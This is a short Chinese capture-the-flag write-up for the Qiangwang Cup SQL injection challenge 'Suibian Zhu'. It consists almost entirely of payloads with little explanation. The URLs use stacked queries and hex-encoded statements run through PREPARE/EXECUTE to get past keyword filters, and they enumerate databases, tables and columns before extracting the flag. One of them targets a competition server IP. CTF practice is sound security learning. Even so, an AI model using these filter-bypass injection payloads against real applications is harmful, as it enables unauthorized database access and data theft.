强网杯SQL注入 “随便注” WriteUP 本文累计 1549 字, 最后更新时间:2022年01月09日 ### 0x00 说在前面: 本题解距离当时比赛有一段时间了,属于题目补档计划,因此先在这里埋个坑。 后面我会把题目环境整理复现出来,到时候补完本题解, 这里先贴一下当时用到的Payload. ### 0x01 正文 **考点备注:** PDO预处理+堆叠注入 /?inject=1';SET+@SQL= 0x73656c656374206966282873656c65637420636f756e7428736368656d615f6e616d65292066726f6d20696e666f726d6174696f6e5f736368656d612e736368656d617461293d322c312c65787028313032342929;PREPARE+pord+FROM+@SQL;EXECUTE+pord;+--+a 查库 http://117.78.37.77:31954/?inject=1';SET+@SQL= 0x53454c4543542067726f75705f636f6e63617428736368656d615f6e616d65292c322046524f4d20696e666f726d6174696f6e5f736368656d612e736368656d617461 ;PREPARE+pord+FROM+@SQL;EXECUTE+pord;+--+a ![Image.png][1] 查表 0x53454C4543542067726F75705F636F6E636174287461626C655F6E616D65292C322046524F4D20696E666F726D6174696F6E5F736368656D612E7461626C6573207768657265207461626C655F736368656D613D22737570657273716C6922 ![Image.png][2] 查字段 0x53454C4543542067726F75705F636F6E63617428636F6C756D6E5F6E616D65292C322066726F6D20696E666F726D6174696F6E5F736368656D612E636F6C756D6E73207768657265207461626C655F736368656D613D22737570657273716C692220616E64207461626C655F6E616D653D223139313938313039333131313435313422 ![Image.png][3] 出数据 0x53454C45435420666C61672C322046524F4D20737570657273716C692E31393139383130393331313134353134 ![Image.png][4] [1]: https://hack.best/usr/uploads/2022/01/4115139669.png [2]: https://hack.best/usr/uploads/2022/01/2366463792.png [3]: https://hack.best/usr/uploads/2022/01/1062613787.png [4]: https://hack.best/usr/uploads/2022/01/838299294.png
Comments | NOTHING